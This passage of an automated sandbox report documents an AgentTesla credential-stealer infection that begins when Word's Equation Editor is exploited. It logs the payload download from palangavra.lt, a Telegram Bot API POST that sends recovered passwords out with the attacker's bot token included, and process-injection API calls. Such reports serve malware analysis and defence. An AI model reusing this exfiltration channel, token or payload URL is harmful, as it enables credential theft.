                                                                                 1 | 192.168.2.22 | 49167 | 144.76.47.167 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                                 Oct 14, 2021 10:22:59.071497917 CEST | 0 | OUT | GET /jukiestay/gufoxqa.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: palangavra.lt
                                                                                Connection: Keep-Alive
                                                                                 Oct 14, 2021 10:22:59.100934982 CEST | 2 | IN | HTTP/1.1 200 OK
                                                                                Date: Thu, 14 Oct 2021 08:22:59 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Thu, 14 Oct 2021 01:10:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 486912
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Content-Type: application/x-msdownload


                                                                                HTTPS Proxied Packets

                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                 0 | 192.168.2.22 | 49169 | 149.154.167.220 | 443 | C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                                 2021-10-14 08:24:56 UTC | 0 | OUT | POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
                                                                                Host: api.telegram.org
                                                                                Content-Length: 1018
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                 2021-10-14 08:24:56 UTC | 0 | IN | HTTP/1.1 100 Continue
                                                                                 2021-10-14 08:24:56 UTC | 0 | OUT | Data Ascii: -----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="chat_id"1366706404-----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/579569OSFull
                                                                                 2021-10-14 08:24:56 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Thu, 14 Oct 2021 08:24:56 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 656
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":3749,"from":{"id":2034238293,"is_bot":true,"first_name":"takership","username":"takership_bot"},"chat":{"id":1366706404,"first_name":"\u627f\u529e\u4eba","last_name":"taker","username":"dtaker","type":"private"},"date":1634199896,"document":{"file_name":"user-579569 2021-10-14 02-52-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIOpWFn6Vjq-3ycowABiEmEbyiu600j-gACwwgAAnGTQVMHP73qYkATfSEE","file_unique_id":"AgADwwgAAnGTQVM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/579569\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                Code Manipulations

                                                                                Statistics

                                                                                CPU Usage


                                                                                Memory Usage


                                                                                High Level Behavior Distribution


                                                                                Behavior


                                                                                System Behavior

                                                                                General

                                                                                Start time:10:22:14
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                Imagebase:0x13fbe0000
                                                                                File size:1423704 bytes
                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:10:22:15
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:10:22:17
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                General

                                                                                Start time:10:22:42
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Disassembly

                                                                                Code Analysis


                                                                                  Executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462986106.0000000002020000.00000040.00000001.sdmp, Offset: 02020000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$x
                                                                                  • API String ID: 0-1344127822
                                                                                  • Opcode ID: d6828d9c424f060da569abce817cb8ef534eb30e70dccd3961d8f1d3f76c4453
                                                                                  • Instruction ID: a12da43f873accce8ca2f41be39d67037ad76408614f46d301ee78dd871da263
                                                                                  • Opcode Fuzzy Hash: d6828d9c424f060da569abce817cb8ef534eb30e70dccd3961d8f1d3f76c4453
                                                                                  • Instruction Fuzzy Hash: 6CA34B70E49228CBC724EF68D98875DBBB1FB88304F1288EAD54CA3254DB386D95CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: n
                                                                                  • API String ID: 0-2013832146
                                                                                  • Opcode ID: e5af1d6dc319d6105ad91f0a9402fe0bee0a4287b9ea65c0ab3d9503793f1ee7
                                                                                  • Instruction ID: f050a8737b9906539fd6a0063b095c0ad85dad9e27f8cf6f94970faeb322cdb5
                                                                                  • Opcode Fuzzy Hash: e5af1d6dc319d6105ad91f0a9402fe0bee0a4287b9ea65c0ab3d9503793f1ee7
                                                                                  • Instruction Fuzzy Hash: DBA33B70D0A218CFC7A9EF28E894AADBBB5FB48700F1145EAD588A3250DF345E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .@l
                                                                                  • API String ID: 0-2179369065
                                                                                  • Opcode ID: 4f1a441f8c4c9d9a7fdad4b3d14db3375cad2daec2e2896a07144d14455e2679
                                                                                  • Instruction ID: 3506fac6068a55c7a4a3121d0b149295d9527a348bc36511369ac90504faa28c
                                                                                  • Opcode Fuzzy Hash: 4f1a441f8c4c9d9a7fdad4b3d14db3375cad2daec2e2896a07144d14455e2679
                                                                                  • Instruction Fuzzy Hash: 1A835D70E44228CBDB24FF78D8846ADBBB6BB88304F0188E9D548A3354DB356E95CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

APIs
• CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 00726E1A
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 041DD84F
Memory Dump Source
• Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
Similarity
• API ID:
• String ID: DmS2$W#w$#w
• API String ID: 0-4063953339
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
Similarity
• API ID:
• String ID: DmS2$W#w$#w
• API String ID: 0-4063953339
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00727103
Strings
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID: 3
• API String ID: 4275171209-1842515611
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID:
• String ID: F1m$F1m
• API String ID: 0-3588151692
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 007271CD
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
                                                                                  • Opcode ID: 626d96491661c502d0a94a7ce00179beedd86d087ec18480b5e299b7a3b8ab9e
                                                                                  • Instruction ID: 66f95fd980a8a18e2e52cc251b108912934b307c6ea2892c0ff2a548aa059a29
                                                                                  • Opcode Fuzzy Hash: 626d96491661c502d0a94a7ce00179beedd86d087ec18480b5e299b7a3b8ab9e
                                                                                  • Instruction Fuzzy Hash: 4E2125B19002599FDB10CF99D884BDEBBF4FF88310F10842AE818A3240D378AA50CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00726F8F
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0072704E
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00726F8F
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0072704E
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 041DDB48
Memory Dump Source
• Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00727103
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

APIs
• API ID: ResumeThread
Memory Dump Source
• Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Strings
• String ID: fCl
Memory Dump Source
• Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false

Strings
• String ID: F1m
Memory Dump Source
• Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false

                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e5c3b90fd980c64e3021411066de04c37b78170d70666d876d79704890cce71e
                                                                                  • Instruction ID: 0f5a76ddf5d9704a185a6b42e817327190b0c930e83951b080d2ed614007dcd2
                                                                                  • Opcode Fuzzy Hash: e5c3b90fd980c64e3021411066de04c37b78170d70666d876d79704890cce71e
                                                                                  • Instruction Fuzzy Hash: 75F0A42061E7918FD7364B28442591B7FA65F83A0931985FB8D85CF35ADA348C62C357
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a445eb791d4ad1c489cd45132c088cdac8038ec29a4b66e5d5ecbb84e38ebb3
                                                                                  • Instruction ID: 28d66e7e66d32aa17e92b7ac52a41250e3b27da372da995e65609d52b5164857
                                                                                  • Opcode Fuzzy Hash: 4a445eb791d4ad1c489cd45132c088cdac8038ec29a4b66e5d5ecbb84e38ebb3
                                                                                  • Instruction Fuzzy Hash: 82F0FC2570D7C28FEB374228042055A7B525F8351932944FBCE41DF34ADA348C63C3A7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 060f1d3d29f0cfeb2fdca6e8447f4c9652edf478eb95c090627827a481f35fab
                                                                                  • Instruction ID: 0a9eecaf1e271942daf81040790eba88c75d3adb1ce86aff583ea05b9b1489a9
                                                                                  • Opcode Fuzzy Hash: 060f1d3d29f0cfeb2fdca6e8447f4c9652edf478eb95c090627827a481f35fab
                                                                                  • Instruction Fuzzy Hash: 75F0A739B105218B6B34995DD004967B7ABDBCAB653248037DC05CF324CB348CD293D7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cc6e8aa22c0fa49e36b07352e74191362e566663e026d0a1c75d51f2a187df4c
                                                                                  • Instruction ID: 432fe84a4ada914673cbed5e475a88806bafca3a75b870205494f3b7eb5e8c97
                                                                                  • Opcode Fuzzy Hash: cc6e8aa22c0fa49e36b07352e74191362e566663e026d0a1c75d51f2a187df4c
                                                                                  • Instruction Fuzzy Hash: F2F0825570D7D14FD7230A2828301AA2F910F8391831A05EBCC81CB6A7D9198C4583A7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94dd300abc58905b2c64951d219523f41051b617119147390ff9b21651db7110
                                                                                  • Instruction ID: ee665f7c35a6bd18856f3ccf8ded59d0dfe84d210062f3850c7e08373f85c5d3
                                                                                  • Opcode Fuzzy Hash: 94dd300abc58905b2c64951d219523f41051b617119147390ff9b21651db7110
                                                                                  • Instruction Fuzzy Hash: BDF0825562D7D14FC733026814205693F964E8390971A05EBC981CF38ADA648C9683A7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d84088e9a01680de24302a7c3718572397e667a2b6e98f03747c76db8a325eb6
                                                                                  • Instruction ID: 30dd732bdb4cb2b778136be4ea9780c841fdc2301e6c8272468d098d5d3f5170
                                                                                  • Opcode Fuzzy Hash: d84088e9a01680de24302a7c3718572397e667a2b6e98f03747c76db8a325eb6
                                                                                  • Instruction Fuzzy Hash: B0F0904861D3C10BFB264B3004646693EA21E9310579988EBC9828F2D7DF3C9865D757
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0cf535972915aa49710e5f6ff96b576d9a66ebfbea3ece87766684064cb7c00d
                                                                                  • Instruction ID: 680fe2558a5896b86996fbd9c6f0e7a8ddb45e5eafb5543b8524f9c89dc7ab08
                                                                                  • Opcode Fuzzy Hash: 0cf535972915aa49710e5f6ff96b576d9a66ebfbea3ece87766684064cb7c00d
                                                                                  • Instruction Fuzzy Hash: 03F0ED3464D3C18FDB238B2884649563FB0AF9320470D00EFD481CB273D6348809D716
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af2bd3319d75e5fd43ba7f7d879c9ae660e648a76ce9f7fd8d00b89b852eac71
                                                                                  • Instruction ID: bd17a51b3c3f8a2c36ce422bc25cb9ed38f14d0c9c527cc4a2eafbcebf16cfe2
                                                                                  • Opcode Fuzzy Hash: af2bd3319d75e5fd43ba7f7d879c9ae660e648a76ce9f7fd8d00b89b852eac71
                                                                                  • Instruction Fuzzy Hash: 5BE0655150E3C08FCB1B97300CB92253F709E93145B4A48DBC886CF2A7EA28CD48DB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2eb3a53a9f8b253692041b6d40c59d4272d51cbf6473fe21a7fe404f26da8877
                                                                                  • Instruction ID: a737bde128723dfc058dabd75c7fda2bc9215107732f2fd03dfe67c0765add80
                                                                                  • Opcode Fuzzy Hash: 2eb3a53a9f8b253692041b6d40c59d4272d51cbf6473fe21a7fe404f26da8877
                                                                                  • Instruction Fuzzy Hash: 6BE0486014E3C15FD72757300C795553F755EA310474A48DBC8D6CE6A7DA28C859C727
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a2ca179a2858036623762916fac98454f4f89c594cdcc9b3b28c89482a866505
                                                                                  • Instruction ID: c8664e5c21fecff889c2f2dce5f1965d6d493c2f3851789a111f22849a74c85e
                                                                                  • Opcode Fuzzy Hash: a2ca179a2858036623762916fac98454f4f89c594cdcc9b3b28c89482a866505
                                                                                  • Instruction Fuzzy Hash: 76E04F5114E3D09FDB179B7008396653FB59F53104B5A48EBC895CE2A7D938C848DB1B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cc517e73df2e5e4d818a3741209434f9ca40da9b6b16aa1d458da7a28d6ac17a
                                                                                  • Instruction ID: 5dc90417a9605c07b7767d6fd32b579a9a1bb3d323d447b6ec4c3cc2ba0b06fd
                                                                                  • Opcode Fuzzy Hash: cc517e73df2e5e4d818a3741209434f9ca40da9b6b16aa1d458da7a28d6ac17a
                                                                                  • Instruction Fuzzy Hash: 0AE0BF5110E7E54FD72757685CF96897F709E0358434A05CBD8C1CB1A7E7185809D367
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 278f9c967fc2c0dde58faba463ab93087ff98abde7690e9cfe66da9461a79aa2
                                                                                  • Instruction ID: ff5cc29393f7da5056a13f8625ae2310f939b7c204e4114373d00263e5ec2244
                                                                                  • Opcode Fuzzy Hash: 278f9c967fc2c0dde58faba463ab93087ff98abde7690e9cfe66da9461a79aa2
                                                                                  • Instruction Fuzzy Hash: 34D0A738B401418FEF349A5DD01442673B7EFC5608318407795058F324DF74DC1556C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462950861.0000000001FB0000.00000040.00000001.sdmp, Offset: 01FB0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b5b64f90fc684dd0cea5d81a9e7585a805318225ea342ee955e919df6eb23139
                                                                                  • Instruction ID: c6a0c8ca232f9857365c54a1bcb49bb89d5eac95e565d7f04dc6c1cbd49d7189
                                                                                  • Opcode Fuzzy Hash: b5b64f90fc684dd0cea5d81a9e7585a805318225ea342ee955e919df6eb23139
                                                                                  • Instruction Fuzzy Hash: 38933D70E0921CCFC728EF28E9946ADBBB1FB89304F0185E9D589A3254DB346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%